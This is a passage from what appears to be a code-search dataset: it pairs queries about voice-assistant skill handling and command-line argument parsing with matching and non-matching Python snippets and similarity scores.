'developer' or \"\n \"'category').\")\n parser.add_argument(\"--specify_subdir\", help=arg_help, nargs=\"?\",\n default=\"\", const=\"<PROMPT>\")\n return parser", "def _process_args(self, args, ds_options):\r\n mgr = HardwareManager(self.client)\r\n\r\n order = {\r\n 'hostname': args['--hostname'],\r\n 'domain': args['--domain'],\r\n 'bare_metal': False,\r\n 'package_id': args['--chassis'],\r\n }\r\n\r\n # Determine if this is a \"Bare Metal Instance\" or regular server\r\n bmc = False\r\n if args['--chassis'] == str(mgr.get_bare_metal_package_id()):\r\n bmc = True\r\n\r\n # Convert the OS code back into a price ID\r\n os_price = self._get_price_id_from_options(ds_options, 'os',\r\n args['--os'])\r\n\r\n if os_price:\r\n order['os'] = os_price\r\n else:\r\n raise CLIAbort('Invalid operating system specified.')\r\n\r\n order['location'] = args['--datacenter'] or 'FIRST_AVAILABLE'\r\n\r\n if bmc:\r\n order['server'] = self._get_cpu_and_memory_price_ids(\r\n ds_options, args['--cpu'], args['--memory'])\r\n order['bare_metal'] = True\r\n\r\n if args['--billing'] == 'hourly':\r\n order['hourly'] = True\r\n else:\r\n order['server'] = args['--cpu']\r\n order['ram'] = self._get_price_id_from_options(\r\n ds_options, 'memory', int(args['--memory']))\r\n\r\n # Set the disk sizes\r\n disk_prices = []\r\n disk_number = 0\r\n for disk in args.get('--disk'):\r\n disk_price = self._get_disk_price(ds_options, disk, disk_number)\r\n disk_number += 1\r\n if disk_price:\r\n disk_prices.append(disk_price)\r\n\r\n if not disk_prices:\r\n disk_prices.append(self._get_default_value(ds_options, 'disk0'))\r\n\r\n order['disks'] = disk_prices\r\n\r\n # Set the disk controller price\r\n if not bmc:\r\n if args.get('--controller'):\r\n dc_price = self._get_price_id_from_options(\r\n ds_options, 'disk_controller', args.get('--controller'))\r\n else:\r\n dc_price = self._get_price_id_from_options(ds_options,\r\n 'disk_controller',\r\n 'None')\r\n\r\n order['disk_controller'] = dc_price\r\n\r\n # Set the port speed\r\n port_speed = args.get('--network') or '100'\r\n\r\n nic_price = self._get_price_id_from_options(ds_options, 'nic',\r\n port_speed)\r\n\r\n if nic_price:\r\n order['port_speed'] = nic_price\r\n else:\r\n raise CLIAbort('Invalid NIC speed specified.')\r\n\r\n if args.get('--postinstall'):\r\n order['post_uri'] = args.get('--postinstall')\r\n\r\n # Get the SSH keys\r\n if args.get('--key'):\r\n keys = []\r\n for key in args.get('--key'):\r\n key_id = resolve_id(SshKeyManager(self.client).resolve_ids,\r\n key, 'SshKey')\r\n keys.append(key_id)\r\n order['ssh_keys'] = keys\r\n\r\n if args.get('--vlan_public'):\r\n order['public_vlan'] = args['--vlan_public']\r\n\r\n if args.get('--vlan_private'):\r\n order['private_vlan'] = args['--vlan_private']\r\n\r\n return order", "def parse_args():\n\n areas = list(default_config['areas'].keys())\n\n class ListAreas(argparse.Action):\n \"\"\"Helper class for argparse to list available areas and exit\"\"\"\n\n def __call__(self, parser, namespace, values, option_string=None):\n print(\"\\n\".join(areas))\n parser.exit()\n\n parser = argparse.ArgumentParser(parents=[kcs_parser],\n conflict_handler='resolve')\n\n parser.add_argument('files', nargs='+', help=\"Input files\")\n parser.add_argument('--area', action='append', required=True,\n choices=areas, help=\"One or more area names\")\n parser.add_argument('--template',\n help=\"Output path template, including subdirectory\")\n parser.add_argument('-v', '--verbosity', action='count',\n default=0, help=\"Verbosity 
level\")\n parser.add_argument('-P', '--nproc', type=int, default=1,\n help=\"Number of simultaneous processes\")\n parser.add_argument('--list-areas', action=ListAreas, nargs=0,\n help=\"List availabe areas and quit\")\n parser.add_argument('--regrid', action='store_true',\n help=\"Regrid the data (to a 1x1 deg. grid)\")\n parser.add_argument('--no-save-results', action='store_true',\n help=\"Store the resulting extracted datasets on disk\")\n parser.add_argument('--no-average-area', action='store_true',\n help=\"Don't average the extracted areas\")\n parser.add_argument('--tempdir')\n parser.add_argument('--subdir-per-realization', action='store_true')\n parser.add_argument('--ignore-common-warnings', action='store_true')\n\n args = parser.parse_args()\n setup_logging(args.verbosity)\n read_config(args.config)\n\n if args.template is None:\n args.template = default_config['data']['extraction']['template']\n args.save_result = not args.no_save_results\n args.average_area = not args.no_average_area\n args.area = {name: default_config['areas'][name] for name in args.area}\n args.area = {key: None if value == 'global' else value for key, value in args.area.items()}\n return args", "def get_options():\n\n description = \"\"\" Creates an scoring matrix for a given alignment \"\"\"\n \n parser = argparse.ArgumentParser(description=description,\n formatter_class=RawDescriptionHelpFormatter)\n # Standard Input\n standard = parser.add_argument_group(title='Standard input',\n description='Standard input for tools.')\n standard.add_argument('-i', \"--input\", dest=\"input\", action='store',\n required=True, help=\"Path for input alignment\")\n standard.add_argument('-o', \"--output\", dest=\"output\", action='store',\n required=True, help=\"Path to output matrix in wide format.\")\n\n args = parser.parse_args()\n\n # Standardize paths\n args.input = os.path.abspath(args.input)\n args.output = os.path.abspath(args.output)\n\n return args" ]
[ "0.5959439", "0.5875722", "0.5843192", "0.5764533", "0.5762908", "0.57036674", "0.5702611", "0.56741303", "0.56671953", "0.5666019", "0.56415075", "0.5633455", "0.5577047", "0.55590963", "0.5546385", "0.55420923", "0.5530415", "0.55239266", "0.5492701", "0.5489848", "0.54787415", "0.54610515", "0.54600614", "0.5459616", "0.54539835", "0.5447735", "0.5431581", "0.5429711", "0.5415869", "0.5409023" ]
0.8013772
0
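The negatives above all share one argparse pattern: declare options, call parse_args(), then keep only the values the user actually set. A minimal, self-contained sketch of that pattern follows; the flag names and the example invocation are illustrative assumptions, not taken from any entry above.

# Minimal sketch of the argparse pattern the negatives above have in common.
# Flag names below are assumptions for illustration only.
import argparse


def parse_filtered_args(argv=None):
    parser = argparse.ArgumentParser(description="example CLI")
    parser.add_argument("-i", "--input", help="input file path")
    parser.add_argument("-o", "--output", help="output file path")
    parser.add_argument("-c", "--charset", help="optional charset override")
    parsed = vars(parser.parse_args(argv))
    # Drop options the user did not supply, as several entries above do.
    return {key: value for key, value in parsed.items() if value is not None}


if __name__ == "__main__":
    # Prints {'input': 'in.txt', 'output': 'out.txt'}; --charset is filtered out.
    print(parse_filtered_args(["-i", "in.txt", "-o", "out.txt"]))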
Get a message to speak on first load of the skill. Useful for postinstall setup instructions.
def get_intro_message(self):
    self.speak_dialog("thank.you")
    return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def speak(message):\n print(message)", "def speak(self):\n print(\"meow!\")", "def speak(self):\n print(\"hello\")", "def install_default_skills(speak=True):\n if exists(MSM_BIN):\n p = subprocess.Popen(MSM_BIN + \" default\", stderr=subprocess.STDOUT,\n stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n res = p.returncode\n if res == 0 and speak:\n # ws.emit(Message(\"speak\", {\n # 'utterance': mycroft.dialog.get(\"skills updated\")}))\n pass\n elif not connected():\n LOG.error('msm failed, network connection is not available')\n ws.emit(Message(\"speak\", {\n 'utterance': mycroft.dialog.get(\"no network connection\")}))\n elif res != 0:\n LOG.error('msm failed with error {}: {}'.format(res, output))\n ws.emit(Message(\"speak\", {\n 'utterance': mycroft.dialog.get(\n \"sorry I couldn't install default skills\")}))\n\n else:\n LOG.error(\"Unable to invoke Mycroft Skill Manager: \" + MSM_BIN)", "def get_intro_message() -> str:\n return \"\"\"You are about to begin a new record.\nType the text sample you want to record.\nThis first sample MUST be typed by the real user (no impostor data).\"\"\"", "def get_init_response():\n speechOutput = GET_INIT_MESSAGE \n\n return response(speech_response_ssml(speechOutput, False))", "def on_launch():\n return get_welcome_message()", "async def speak(ctx, *, message: commands.clean_content):\n await _speak(ctx, \"en\", \"com\", message)", "async def on_start(self):\n m = \"**{}** has started a game of {}! To participate, say `I`! **{} players needed.**\".format(\n self.message.author.display_name, self.name, self.num)\n await client.say(self.message, m)", "def introductions(self):\n speak('omxplayer {0}'.format(os.path.join(self.audio_commands, 'introductions3.ogg')))\n speak('omxplayer {0}'.format(os.path.join(self.audio_commands, 'request.ogg')))", "def get_hello():\n\n return \"Hello\"", "def hello():\n return 'Hello I like to make AI Apps'", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch message\n return get_welcome_response()", "def talk(self):\n if self.location.character:\n return self.location.character.talk()\n else:\n return \"There is no one to talk to.\"", "async def help_skill(self, message):\n logging.debug(\"searching for {}\".format(message.regex))\n found_skill = next(\n (\n skill\n for skill in self.opsdroid.skills\n if skill.__name__ == message.regex.group(1)\n ),\n False,\n )\n if not found_skill:\n response = \"{} skill not found\".format(message.regex.group(1))\n elif not found_skill.__doc__:\n response = \"No usage found for {}\".format(found_skill.__name__)\n else:\n response = found_skill.__doc__\n await message.respond(response)", "def get_welcome_message(restart=False):\n print(\"get_welcome_message, restart: \", str(restart))\n\n if restart == True:\n message = \"OK, wir starten ein neues Spiel.\" + SPIELER_PROMPT_TEXT\n else:\n message = WELCOME_MESSAGE\n \n reprompt_text = SPIELER_PROMPT_TEXT\n\n return response(speech_response=message, should_end_session=False,\\\n reprompt_text=reprompt_text, card_text=WELCOME_MESSAGE)", "async def help(self, message):\n response = []\n for skill in self.opsdroid.skills:\n if skill.__doc__:\n response.append(\"{}: {}\".format(skill.__name__, skill.__doc__))\n else:\n doc_string_not_found = \"doc string not found for {}\".format(\n skill.__name__\n )\n logging.debug(doc_string_not_found)\n response.append(skill.__name__)\n await message.respond(\"\\n\".join(sorted(response)))", "async def say_hello(self, ctx: MyContext):\n _ = await 
ctx.get_translate_function()\n\n await ctx.send(_(self.config()[\"hello_message\"]))", "def on_launch(launch_request, session):\r\n # Dispatch to your skill's launch message\r\n return get_welcome_response()", "def announce_target(self):\n letter = self.bubbles[self.target].letter\n question = self.load_sound(\"question-\" + letter + \".wav\")\n question.play()\n if android: # get_length() not supported by android.mixer\n ms = 2000 \n else:\n ms = int(question.get_length()*1000)\n pygame.time.set_timer(Game.ANNOUNCE_EVENT, ms)\n self.state = Game.ANNOUNCE_STATE", "def welcome():\n on_session_start()\n return question(PRIME_QUESTION, intro=WELCOME_SPEECH)", "def handle_speak(event):\n context = {'client_name': 'mycroft_listener',\n 'source': 'audio',\n 'destination': [\"skills\"]}\n bus.emit(Message('speak', event, context))", "def find_start_recognition_message(self):\n messages = self.find_messages_by_type(\"StartRecognition\")\n assert len(messages) == 1\n return messages[0]", "def start(update,context):\r\n update.message.reply_text('welcome to voice bot')", "def func(self):\n if not self.args:\n self.msg(\n \"{wYou are currently speaking:{n %s\"\n % self.caller.languages.current_language.capitalize()\n )\n self.list_languages()\n return\n if \"translate\" in self.switches:\n obj = self.caller.search(self.args)\n if not obj:\n return\n translation = obj.item_data.translation\n matches = False\n for lang in self.caller.languages.known_languages:\n if lang in translation:\n self.msg(\n \"You translate the following from %s:\\n%s\"\n % (lang.capitalize(), translation[lang])\n )\n matches = True\n if not matches:\n self.msg(\n \"%s does not seem to contain any foreign tongue you can read.\" % obj\n )\n return\n if not self.switches:\n args = self.args.lower()\n if args == \"arvani\" or args == \"common\":\n self.caller.attributes.remove(\"currently_speaking\")\n self.msg(\"{wYou are now speaking Arvani.{n\")\n return\n if args not in self.caller.languages.known_languages:\n self.msg(\"You cannot speak %s.\" % self.args)\n self.list_languages()\n return\n self.caller.db.currently_speaking = args\n self.msg(\"{wYou are now speaking %s.{n\" % self.args)\n return\n player = self.caller.player.search(self.lhs)\n if not player:\n return\n targ = player.char_ob\n if not targ:\n self.msg(\"Not found.\")\n return\n if \"teachme\" in self.switches:\n if self.caller.languages.additional_languages <= 0:\n self.msg(\n \"You need a higher rank of linguistics before you can learn anything else.\"\n )\n return\n req = targ.ndb.language_requests or {}\n req[self.caller] = self.rhs\n targ.ndb.language_requests = req\n self.msg(\"You request that %s teach you %s.\" % (targ, self.rhs))\n targ.msg(\n \"{w%s has requested that you teach them %s.{n\" % (self.caller, self.rhs)\n )\n return\n if \"teach\" in self.switches:\n req = self.caller.ndb.language_requests or {}\n if targ not in req:\n self.msg(\"You do not have a request from %s.\" % targ)\n return\n lang = req[targ].lower()\n if lang not in self.caller.languages.known_languages:\n self.msg(\"You do not know %s.\" % lang)\n self.list_languages()\n return\n if targ.languages.max_languages <= len(targ.languages.known_languages):\n self.msg(\"They know as many languages as they can learn.\")\n return\n targ.languages.add_language(lang)\n self.msg(\"You have taught %s to %s.\" % (lang, targ))\n targ.msg(\"%s has taught you %s.\" % (self.caller, lang))\n return", "def on_launch(launch_request, session):\n # Dispatch to your skill's launch\n return 
get_welcome_response()", "def test_get_skill_name(self):\n result = self.runner.invoke(\n cli,\n [*CLI_LOG_OPTION, \"config\", \"get\", \"skills.dummy.name\"],\n standalone_mode=False,\n )\n assert result.exit_code == 0\n assert result.output == \"dummy\\n\"", "async def on_ready(self):\n self.send_message = self.bot.get_cog('Text').send_message", "def speak(self, what):\n if isinstance(what, str):\n return self.whatever()\n\n what = self.clean(what)\n if not what or what == '':\n return self.silence()\n if what.isupper():\n return self.shouting()\n if what.endswith('?'):\n return self.asking()\n return self.whatever()", "async def speaklang(ctx, language, *, message: commands.clean_content):\n await _speak(ctx, language, \"com\", message)" ]
[ "0.61970544", "0.59956497", "0.5926281", "0.5872123", "0.58696866", "0.5797025", "0.579132", "0.57152486", "0.5705992", "0.56784135", "0.56503886", "0.5580634", "0.552781", "0.55209553", "0.55069524", "0.5461222", "0.54496735", "0.5446346", "0.5446035", "0.54340476", "0.54330224", "0.5403676", "0.5394272", "0.53837305", "0.5383698", "0.53715837", "0.5345385", "0.53420013", "0.53122133", "0.5290316" ]
0.6545299
0
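For context on the record above, here is a hedged sketch of how get_intro_message() typically sits inside a Mycroft-style skill class. The import path, the class name, and the "thank.you" dialog file are assumptions about the surrounding framework rather than anything shown in the record itself.

# Hedged sketch: get_intro_message() from the document above inside a
# Mycroft-style skill. Class name and dialog file are illustrative assumptions.
from mycroft import MycroftSkill


class ThankYouSkill(MycroftSkill):
    def get_intro_message(self):
        # Spoken once, on first load of the skill -- the hook the query
        # describes as useful for post-install setup instructions.
        self.speak_dialog("thank.you")
        return None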
Handle conversation. This method gets a peek at utterances before the normal intent handling process after a skill has been invoked once. To use, override the converse() method and return True to indicate that the utterance has been handled.
def converse(self, utterances, lang="en-us"):
    # check if game was abandoned midconversation and we should clean it up
    self.maybe_end_game()
    if self.playing:
        ut = utterances[0]
        # if self will trigger do nothing and let intents handle it
        if self.will_trigger(ut):
            # save / restore will trigger
            return False
        # capture speech and pipe to the game
        words = ut.split(" ")
        self.speak_output(self.game.do_command(words))
        self.make_active()
        return True
    return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handle_converse_request(message):\n skill_id = int(message.data[\"skill_id\"])\n utterances = message.data[\"utterances\"]\n lang = message.data[\"lang\"]\n global ws, loaded_skills\n # loop trough skills list and call converse for skill with skill_id\n for skill in loaded_skills:\n if loaded_skills[skill][\"id\"] == skill_id:\n try:\n instance = loaded_skills[skill][\"instance\"]\n except:\n LOG.error(\"converse requested but skill not loaded\")\n ws.emit(Message(\"skill.converse.response\", {\n \"skill_id\": 0, \"result\": False}))\n return\n try:\n result = instance.converse(utterances, lang)\n ws.emit(Message(\"skill.converse.response\", {\n \"skill_id\": skill_id, \"result\": result}))\n return\n except:\n LOG.error(\n \"Converse method malformed for skill \" + str(skill_id))\n ws.emit(Message(\"skill.converse.response\",\n {\"skill_id\": 0, \"result\": False}))", "def handleForever(self):\n self._logger.info(\"Starting to handle conversation with keyword '%s'.\",\n self.persona)\n while True:\n # Print notifications until empty\n notifications = self.notifier.getAllNotifications()\n for notif in notifications:\n self._logger.info(\"Received notification: '%s'\", str(notif))\n\n\n self._logger.debug(\"Started listening for keyword '%s'\",\n self.persona)\n\n print(\"conversation >> start listening for keyword %s\" % self.persona)\n\n threshold, is_conversation_desired = self.mic.passiveListen(self.persona)\n self._logger.debug(\"Stopped listening for keyword '%s'\",\n self.persona)\n\n\n print(\"conversation >> stopped listening for keyword %s\" % self.persona)\n\n if not is_conversation_desired:\n self._logger.info(\"Nothing has been said or transcribed.\")\n print(\">> Nothing has been said or transcribed.\")\n continue\n self._logger.info(\"Keyword '%s' has been said!\", self.persona)\n\n print(\"conversation >> Keyword %s has been said!\" % self.persona)\n\n self._logger.debug(\"Started to listen actively with threshold: %r\",\n threshold)\n\n print(\"conversation >> Started to listen actively with threshold: %r\" % threshold)\n\n input = self.mic.activeListenToAllOptions(threshold)\n self._logger.debug(\"Stopped to listen actively with threshold: %r\",\n threshold)\n\n print(\"conversation >> Stopped listening\")\n\n if input:\n print(\"conversation >> recieved input: \" + str(input))\n print(\"conversation >> Sending '{0}' to brain\".format(input.get(\"_text\")))\n self.brain.query(input.get(\"_text\"))\n else:\n messages = [\"You know, I can't help you if you mumble like that.\"\n ,\"Does not compute, how about we try this again.\"]\n\n message = random.choice(messages)\n\n self.mic.say(message)", "def handle(self, talk_action):\n target = talk_action.target\n action = talk_action.action\n logging.debug(\n \"Target: %s. Action: %s. 
Connections: %s\" % (target, action, len(self.tcp_clients))\n )\n if action == \"INITIATE\":\n logging.debug(\n \">>> Starting VoIP conversation for '%s'\" % self.session_key\n )\n self.voip()\n elif action == \"DENY\":\n for client in self.tcp_clients:\n if client is not talk_action.instigator:\n client.server.queue_message(\n \"TALK %s: DENIED\" % self.session_key,\n client.sock\n )\n elif action == \"ACCEPT\":\n for client in self.tcp_clients:\n if client is not talk_action.instigator:\n client.server.queue_message(\n \"TALK %s: ACCEPTED\" % self.session_key,\n client.sock\n )", "def on_intent(event):\n\n intent = event[\"request\"][\"intent\"][\"name\"]\n\n if intent in (\"AMAZON.CancelIntent\", \"AMAZON.StopIntent\", \"AMAZON.NoIntent\"):\n return handle_session_end_request()\n\n if intent == \"AMAZON.YesIntent\":\n if \"attributes\" in event[\"session\"] and \"previousIntent\" in \\\n event[\"session\"][\"attributes\"]:\n\n if event[\"session\"][\"attributes\"][\"previousIntent\"] == \"AMAZON.HelpIntent\":\n return main_handler(event)\n\n speech_output = event[\"session\"][\"attributes\"][\"nextStations\"]\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n speech_output = \"Sorry, something went wrong.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n if intent == \"isBikesAvailable\":\n return main_handler(event)\n\n if intent == \"AMAZON.HelpIntent\":\n return handle_help_intent()\n\n speech_output = \"Sorry, I don\\'t know that.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)", "def speech_callback(self, data):\n speech = data.data\n print \"RECEIVED SPEECH: \", speech\n if \"keyword detected\" in speech:\n if self.idling:\n self.control_pub.publish(\"ft go; idle stop; stt go\")\n self.behav_pub.publish(\"greet\")\n # self.behav_pub.publish(random.choice(categorized_behaviors['greeting']))\n elif \"play\" in speech:\n print \"STARTING GAME\"\n self.start_game = \"TTT\"\n elif \"bye\" in speech:\n self.control_pub.publish(\"idle go; stt go; stt_keyword go\")\n elif \"okay\" in speech:\n self.ok = True", "def _emit_utterance_to_skills(message_to_emit: Message) -> bool:\n # Emit single intent request\n ident = message_to_emit.context['ident']\n resp = bus.wait_for_response(message_to_emit, timeout=10)\n if not resp:\n LOG.error(f\"Skills didn't handle {ident}!\")\n return False\n return True", "def onCurrentSentence(self, *_args):\n global instance\n log(str(_args))\n #if (instance.isSpeaking and len(_args[1])==0): instance.SpeakDone()\n return", "def talk(self):\r\n if self.conversation is not None:\r\n print(\"[\" + self.name + \" says]: \" + self.conversation)\r\n else:\r\n print(self.name + \" doesn't want to talk to you\")", "def speak(self):\n # Speaks randomly to another agent on the same cell\n anticipated_meaning = None\n cellmates = self.model.grid.get_cell_list_contents([self.pos])\n\n # If other agents on the same cell\n if len(cellmates) > 1:\n hearer = self.random.choice(cellmates)\n\n while (hearer == self): # agents should not talk to themselves\n hearer = self.random.choice(cellmates)\n\n meaning = self.random.choice(self.model.schedule.agents).unique_id\n\n # If the speaker is not acquainted with the meaning\n if meaning not in self.meanings:\n print(\"New meaning added to speaker\")\n self.meanings.append(meaning)\n return Conversation(word=None, meaning=None, success=0.0)\n\n # If the hearer is not acquainted 
with the meaning\n if meaning not in hearer.meanings:\n print(\"New meaning added to hearer\")\n hearer.meanings.append(meaning)\n return Conversation(word=None, meaning=None, success=0.0)\n\n # 50% chance of having an anticipated meaning default\n if self.random.random() <= self.model.antecipated_prob:\n print(\" \" + str(self.unique_id) +\n \" points at \" + str(meaning))\n anticipated_meaning = meaning\n\n # If the speaker has a word for the meaning\n if meaning in self.meaning2word:\n word = self.meaning2word[meaning]\n\n # If the hearer has a word for the meaning\n if word in hearer.word2meaning:\n # If the hearer has no anticipated meaning\n if anticipated_meaning == None:\n return Conversation(word=word, meaning=meaning, success=1.0)\n # If anticipated meaning different from hearer meaning\n if (anticipated_meaning != None\n and anticipated_meaning != hearer.word2meaning[word]):\n hearer.delete_link(word)\n hearer.create_link(word, anticipated_meaning)\n return None\n # If anticipated meaning same as hearer meaning\n if (anticipated_meaning != None\n and anticipated_meaning == hearer.word2meaning[word]):\n return Conversation(word=word, meaning=meaning, success=1.0)\n\n # If the hearer has no word for the meaning\n else:\n # If anticipated meaning same as speaker meaning\n if (anticipated_meaning != None\n and word not in hearer.word2meaning\n and anticipated_meaning not in hearer.meaning2word):\n hearer.create_link(word, anticipated_meaning)\n return Conversation(word=word, meaning=meaning, success=0.0)\n\n # If the speaker has no word for the meaning\n if meaning not in self.meaning2word:\n return Conversation(word=None, meaning=meaning, success=0.0)", "def decide_action(self):\t\t\t\t\t#defining the function to decide the action\n recognizer, audio = self.speech.listen_for_audio()\t\t#listening for the audio\n\n # received audio data, now we'll recognize it using Google Speech Recognition\n speech = self.speech.google_speech_recognition(recognizer, audio)\t#storing the speech into variable as a text\n\n if speech is not None:\t\t#if speech is not recognized\n try:\n req = requests.get('https://api.wit.ai/message?v=20160918&q=%s' % speech,\n headers={\"Authorization\": wit_ai_token})\t\t#getting the wit.ait token and checking it\n print req.text\t\t\t#printing the text\n json_responce = json.loads(req.text)\t\t#printing the responce\n entities = None\t\t\t#inititaling the entities\n intent = None\t\t\t#initialising the intent\n if 'entities' in json_responce and 'Intent' in json_responce['entities']:\t#checking the the intents and entitites\n entities = json_responce['entities']\t\t#entities \n intent = json_responce['entities']['Intent'][0][\"value\"]\t#intents \n\n print intent\t#printing the intents\n if intent == 'greeting':\t#checking the intent type\n self.__text_action(self.nlg.greet()) #getting the function of the intent\n elif intent == 'snow white':\t\t#checking the intent type\n self.__text_action(self.nlg.snow_white())\t\t#getting the function of the intent\n elif intent == 'weather':\t\t#checking the intent type\n self.__weather_action(entities)\t#getting the function of the intent\n elif intent == 'news':\t\t\t#checking the intent type\n self.__news_action()\t#getting the function of the intent\n elif intent == 'maps':\t\t\t#getting the function of the intent\n self.__maps_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'holidays':\t\t#getting the function of the intent#checking the intent type\n 
self.__holidays_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'appearance':\t\t#getting the function of the intent#checking the intent type\n self.__appearance_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user status':\t\t#getting the function of the intent#checking the intent type\n self.__user_status_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user name':\t\t\t#getting the function of the intent#checking the intent type\n self.__user_name_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'personal status':\t\t#getting the function of the intent#checking the intent type\n self.__personal_status_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'joke':\t\t\t#getting the function of the intent#checking the intent type\n self.__joke_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'insult':\t\t#getting the function of the intent#checking the intent type\n self.__insult_action()\t#getting the function of the intent#checking the intent type\n return\t\t\t\t#retuning\n elif intent == 'appreciation':\t\t\t#getting the function of the intent#checking the intent type\n self.__appreciation_action()\t\t\t#getting the function of the intent#checking the intent type\n return\n elif intent == 'music':\t\t\t#getting the function of the intent#checking the intent type\n self.__music_action(music_file)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'navigation':\t\t\t#getting the function of the intent#checking the intent type\n self.__navigate_action()\n elif intent == 'tasks':\n self.__calender_events()\n\t\telif intent == 'guide':\n self.__guide()\n elif intent == 'web':\n self.__web()\n elif intent == 'video':\n self.__video()\n else: # No recognized intent\n self.__text_action(\"I'm sorry, I don't know about this yet.\")\n return\n\n except Exception as e:\n print \"Failed wit !\"\t\t\t#error message\n print(e)\t\t\t#printing the error\n traceback.print_exc()\n self.__text_action(\"I'm sorry, I couldn't understand what you mean !!\") #printing message\n return\t\t\t\t\n\n self.decide_action()", "def respond(sentence):\n cleaned = preprocess_text(sentence)\n parsed = TextBlob(cleaned)\n pprint(\"POSITION Tags\")\n pprint(parsed.pos_tags)\n\n # Loop through all the sentences, if more than one. This will help extract the most relevant\n # response text even across multiple sentences (for example if there was no obvious direct noun\n # in one sentence\n pronoun, noun, adjective, verb = find_candidate_parts_of_speech(parsed)\n\n # If we said something about the bot and used some kind of direct noun, construct the\n # sentence around that, discarding the other candidates\n resp = check_for_comment_about_bot(pronoun, noun, adjective)\n\n # If we just greeted the bot, we'll use a return greeting\n if not resp:\n resp = check_for_greetings(parsed)\n if resp:\n resp = resp + \". 
Ssup ?\"\n\n if not resp:\n resp = check_for_signout(parsed)\n\n if not resp:\n # If we didn't override the final sentence, try to construct a new one:\n if not pronoun:\n resp = random.choice(NONE_RESPONSES)\n elif pronoun == 'I' and not verb:\n resp = random.choice(COMMENTS_ABOUT_SELF)\n else:\n resp = construct_response(pronoun, noun, verb)\n\n # If we got through all that with nothing, use a random response\n if not resp:\n resp = random.choice(NONE_RESPONSES)\n\n #logger.info(\"Returning phrase '%s'\", resp)\n pprint(\"RETURNING PHRASE\")\n pprint(resp)\n # Check that we're not going to say anything obviously offensive\n # filter_response(resp)\n\n return resp", "def __handle_message_activity(self, activity):\n BotRequestHandler.STATE+=1 ## POORMAN'S STATE TRACKING\n self.send_response(200)\n self.end_headers()\n credentials = MicrosoftAppCredentials(APPID, APPPASSWORD)\n connector = ConnectorClient(credentials, base_url=activity.service_url)\n LUIStext = ''\n\n ## FIRST, GET APPID\n if self.STATE==1:\n if activity.text:\n BotRequestHandler.LUISAPPID=activity.text\n reply = BotRequestHandler.__create_reply_activity(activity, \"You entered application ID: %s\\nNow, please input your subscription key (default: %s):\" % (activity.text,self.LUISAPPKEY))\n\n ## SECOND, GET APPKEY\n elif self.STATE==2:\n if activity.text:\n BotRequestHandler.LUISAPPKEY=activity.text\n reply = BotRequestHandler.__create_reply_activity(activity, \"Great! You entered application key: %s\\nNow, enter some text for the LUIS model to render:\" % activity.text)\n\n ## THIRD AND ONWARDS: SEND TEXT TO LUIS AND REPORT LUIS RESPONSE TO THE USER\n else:\n try:\n CLIENT = LUISClient(self.LUISAPPID, self.LUISAPPKEY, True)\n res = CLIENT.predict(activity.text)\n while res.get_dialog() is not None and not res.get_dialog().is_finished():\n TEXT = input('%s\\n'%res.get_dialog().get_prompt())\n res = CLIENT.reply(TEXT, res)\n LUIStext=self.__handle_LUIS_response(res)\n reply = BotRequestHandler.__create_reply_activity(activity, 'LUIS says: %s' % LUIStext)\n except Exception as exc:\n LUIStext=exc\n print(\"Error: %s\" % exc)\n reply = BotRequestHandler.__create_reply_activity(activity, 'About %s, LUIS complains: %s' % (activity.text,LUIStext))\n\n connector.conversations.send_to_conversation(reply.conversation.id, reply)", "def handle_message(self, msg, status):\n\n body = ensure_unicode(msg.Body)\n chat_id = get_chat_id(msg.Chat)\n\n if len(body) == 0:\n return False\n\n for name, cmd in self.commands.items():\n if body == name:\n cmd(msg, chat_id)\n return True\n\n\n if self.troller_is_running.get(chat_id):\n response = self.alice.respond(body)\n if response:\n msg.Chat.SendMessage(response)\n return True\n else:\n return False\n else:\n return False", "def response(sentence, model, user_id='123', context={}, show_details=False):\n # Load intents\n data_path = os.path.join(\"data/\", \"data_intents.json\")\n with open(data_path) as json_data:\n intents = json.load(json_data)\n\n # Classify sentence\n results = classify(sentence, model)\n # if we have a classification then find the matching intent tag\n if results:\n # loop as long as there are matches to process\n while results:\n for i in intents['intents']:\n # find a tag matching the first result\n if i['tag'] == results[0][0]:\n # set context for this intent if necessary\n if 'context_set' in i:\n if show_details: print('context:', i['context_set'])\n context[user_id] = i['context_set']\n\n # check if this intent is contextual and applies to this user's conversation\n 
if not 'context_filter' in i or \\\n (user_id in context and 'context_filter' in i and i['context_filter'] == context[user_id]):\n if show_details: print ('tag:', i['tag'])\n # a random response from the intent\n if i[\"tag\"] == \"goodbye\":\n print(random.choice(i['responses']))\n sys.exit()\n else:\n return print(random.choice(i['responses']))\n\n results.pop(0)", "def func(self):\n\n # Set up function variables.\n caller = self.caller\n rplist = self.rhs.split(\":\") if self.rhs else None\n\n # Find and confirm suitability of target.\n if not self.args:\n caller.msg(\"Talk to whom?\")\n return\n\n target = caller.search(self.args,\n typeclass=NPC,\n nofound_string=\"You cannot talk to {}.\".format(self.args))\n if not target:\n return\n\n # Handle roleplay entries.\n if rplist:\n for text in rplist:\n if text[0] in [\"'\"]:\n caller.execute_cmd(\"Say \" + text[1:])\n else:\n caller.execute_cmd(\"Pose \" + text)\n\n # Call use_object hook on object.\n target.at_talk(caller)", "async def test_intent(self, dm):\n request = create_request(\"other\", \"intent\")\n result = await dm.apply_handler(request, create_responder(request))\n assert result.dialogue_state == \"intent\"", "def run_model(self, chat: Tuple[str, str]) -> Optional[DialogueObject]:\n\n if chat[1] == \"ipdb\":\n ipdb.set_trace()\n\n if len(self.dialogue_stack) > 0 and self.dialogue_stack[-1].awaiting_response:\n return None\n\n # chat is a single line command\n speaker, chatstr = chat\n preprocessed_chatstrs = preprocess.preprocess_chat(chatstr)\n\n # Push appropriate DialogueObjects to stack 